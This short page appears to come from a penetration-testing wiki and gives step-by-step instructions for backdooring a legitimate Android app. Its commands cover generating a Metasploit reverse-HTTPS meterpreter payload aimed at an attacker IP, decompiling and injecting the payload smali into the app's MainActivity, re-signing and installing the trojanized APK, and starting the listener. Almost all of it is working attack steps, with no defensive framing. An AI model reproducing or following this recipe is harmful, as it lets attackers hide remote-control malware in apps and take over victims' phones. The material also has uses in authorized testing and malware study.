4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)

Create Payload

msfvenom -p android/meterpreter/reverse_https LHOST=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o meterpreter.apk

Decompile meterpreter.apk & original app_name.apk

apktool d -f -o ./payload_apk /path/to/your/meterpreter.apk

apktool d -f -o ./original_apk /path/to/your/app_name.apk

Add folder to original project:

mkdir ./original_apk/metasploit; mkdir ./original_apk/metasploit/stage

Copy payload files:

cp ./payload_apk/smali/com/metasploit/stage/* ./original_apk/smali/metasploit/stage/

Get MainActivity name:

In some cases the default name is already "MainActivity"
Search AndroidManifest.xml for an <activity>-tag which contains both:
- <action android:name="android.intent.action.MAIN"/>
- <category android:name="android.intent.category.LAUNCHER"/>
- Look out for the tag-parameter: android:name="core.MainActivity" (it can have a different name, core indicates a directory within the smali directory)

Modify MainActivity.smali

Search for:
- ;->onCreate(Landroid/os/Bundle;)V
Add another line (following the line above) and paste:
- invoke-static {p0}, Lcom/metasploit/stage/Payload; ->start(Landroid/content/Context;)V

Add all necessary app permissions from ./meterpreter/AndroidManifest.xml into the original ./original_apk/AndroidManifest.xml

Recompile:

apktool b ./original_apk

Sign apk (key-creation + signing):

 keytool -genkey -v -keystore my-release-key.keystore -alias myalias  -keyalg RSA -keysize 2048 -validity 10000

/home/<user>/Android/Sdk/build-tools/<27.0.3_OR_CHECK_YOUR_USED_VERSION>/apksigner sign --ks my-release-key.keystore ./original_apk/dist/app_name.apk

Install modified apk

adb install /path/to/app_with_backdoor.apk

Start meterpreter session handler (use same IP & port as you used to generate the payload above):

msfconsole
use multi/handler
set payload android/meterpreter/reverse_https
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run

Last updated 6 years ago